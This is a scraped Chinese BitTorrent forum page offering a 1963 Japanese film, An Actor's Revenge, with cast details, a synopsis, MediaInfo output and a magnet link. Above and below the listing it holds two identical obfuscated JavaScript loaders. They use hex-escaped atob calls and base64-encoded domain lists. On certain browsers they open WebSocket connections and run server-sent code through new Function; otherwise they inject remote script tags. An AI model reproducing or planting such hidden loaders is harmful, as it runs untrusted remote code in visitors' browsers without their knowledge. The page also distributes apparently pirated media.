雪之丞变化[双语字幕].An.Actor's.Revenge.1963.1080p.BluRay.DD2.0.x265-10bit 8.30GB

版主小s 1月前 268

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 雪之丞变化 / 男伎的复仇 / Yukinojo henge / An Actor's Revenge

◎片 名 雪之丞変化

◎年 代 1963

◎产 地 日本

◎类 别 剧情

◎语 言 日语

◎上映日期 1963-01-13

◎IMDb链接 https://www.imdb.com/title/tt0057710/

◎豆瓣评分 7.5/10 (808人评价)

◎豆瓣链接 https://movie.douban.com/subject/1297019/

◎片 长 113 分钟

◎导 演 市川昆 Kon Ichikawa (id:1041592)

◎编 剧 伊藤大辅 Daisuke It? (id:1029446)

衣笠贞之助 Teinosuke Kinugasa (id:1016915)

和田夏十 Natto Wada (id:1052419)

◎演 员 长谷川一夫 Kazuo Hasegawa (id:1033659)

山本富士子 Fujiko Yamamoto (id:1039058)

若尾文子 Ayako Wakao (id:1042051)

市川雷藏 Raiz? Ichikawa (id:1050948)

美轮明宏 Akihiro Miwa (id:1045925)

中村雁治郎 Ganjiro Nakamura (id:1136296)

林成年 Narutoshi Hayashi (id:1052601)

柳永二郎 Eijir? Yanagi (id:1052187)

毛利菊枝 Kikue M?ri (id:1043858)

胜新太郎 Shintar? Katsu (id:1036986)

船越英二 Eiji Funakoshi (id:1034133)

浜村淳 Jun Hamamura (id:1008310)

木村元 Gen Kimura (id:1007288)

德川梦声 Musei Tokugawa (id:1004038)

伊达三郎 Saburo Date (id:1003912)

永田雅一 Masaichi Nagata (id:1008883)

市川昆 Kon Ichikawa (id:1041592)

Setsuo Kobayashi Setsuo Kobayashi (id:1288794)

西冈善信 Yoshinobu Nishioka (id:1013153)

中村雅哉 Masaya Nakamura (id:1017740)

◎标 签 市川昆 / 日本 / 日本电影 / 若尾文子 / 1963 / 1960s / 市川崑 / 長谷川一夫

◎简 介

著名歌舞伎演员中村雪之丞(长谷川一夫 饰),其童年时父母遭奸人陷害,相继身亡。年幼的雪之丞无依无靠,幸遇仗义善良的歌舞伎一人中村菊之丞(市川中車 饰)。菊之丞将其收为徒弟,倾囊传授舞技和剑术,发誓协助雪之丞报仇雪恨。

转眼数年过去,雪之丞已经成长为独当一面的优秀歌舞伎艺人。他与师傅一路来至江户,终于发现仇人——原长崎奉行——土部三斎(中村鴈治郎 饰),复仇之火自此熊熊燃起……

本片根据三上於菟吉同名原著改编,并荣获1964年每日电影最佳艺术指导殊荣。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 95015081685454540733515819774266168427 (0x477B3D35918E3F8A5208712A7E15D46B)

  4. Complete name : An.Actor'[email protected]v

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.30 GiB

  8. Duration : 1 h 53 min

  9. Overall bit rate : 10.5 Mb/s

  10. Movie name : An Actor's Revenge 1963 1080p BluRay DD2.0 [email protected]

  11. Encoded date : UTC 2021-10-20 12:21:05

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 53 min

  21. Bit rate : 9 761 kb/s

  22. Width : 1 920 pixels

  23. Height : 800 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.265

  31. Stream size : 7.75 GiB (93%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : AC-3

  39. Format/Info : Audio Coding 3

  40. Commercial name : Dolby Digital

  41. Codec ID : A_AC3

  42. Duration : 1 h 53 min

  43. Bit rate mode : Constant

  44. Bit rate : 640 kb/s

  45. Channel(s) : 1 channel

  46. Channel layout : C

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 31.250 FPS (1536 SPF)

  49. Compression mode : Lossy

  50. Stream size : 520 MiB (6%)

  51. Title : Japanese

  52. Language : Japanese

  53. Service kind : Complete Main

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 52 min

  63. Bit rate : 22.5 kb/s

  64. Count of elements : 1816

  65. Stream size : 18.1 MiB (0%)

  66. Title : CHS

  67. Language : Chinese

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 52 min

  77. Bit rate : 22.8 kb/s

  78. Count of elements : 1816

  79. Stream size : 18.4 MiB (0%)

  80. Title : CHT

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Text #3

  85. ID : 5

  86. Format : PGS

  87. Muxing mode : zlib

  88. Codec ID : S_HDMV/PGS

  89. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration : 1 h 52 min

  91. Bit rate : 22.5 kb/s

  92. Count of elements : 1816

  93. Stream size : 18.2 MiB (0%)

  94. Title : CHS&ENG

  95. Language : Chinese

  96. Default : No

  97. Forced : No


  98. Text #4

  99. ID : 6

  100. Format : PGS

  101. Muxing mode : zlib

  102. Codec ID : S_HDMV/PGS

  103. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  104. Duration : 1 h 52 min

  105. Bit rate : 22.8 kb/s

  106. Count of elements : 1816

  107. Stream size : 18.4 MiB (0%)

  108. Title : CHT&ENG

  109. Language : Chinese

  110. Default : No

  111. Forced : No


  112. Menu

  113. 00:00:00.000 : en:Chapter 01

  114. 00:05:10.685 : en:Chapter 02

  115. 00:08:12.701 : en:Chapter 03

  116. 00:11:13.339 : en:Chapter 04

  117. 00:19:37.343 : en:Chapter 05

  118. 00:23:59.229 : en:Chapter 06

  119. 00:30:18.233 : en:Chapter 07

  120. 00:38:22.342 : en:Chapter 08

  121. 00:45:16.380 : en:Chapter 09

  122. 00:51:03.602 : en:Chapter 10

  123. 01:00:10.273 : en:Chapter 11

  124. 01:14:30.132 : en:Chapter 12

  125. 01:23:12.446 : en:Chapter 13

  126. 01:28:19.336 : en:Chapter 14

  127. 01:35:21.007 : en:Chapter 15

  128. 01:39:28.254 : en:Chapter 16

  129. 01:46:22.626 : en:Chapter 17




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:4F241565DA127B834093A2977AD0B73E5832FF30

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};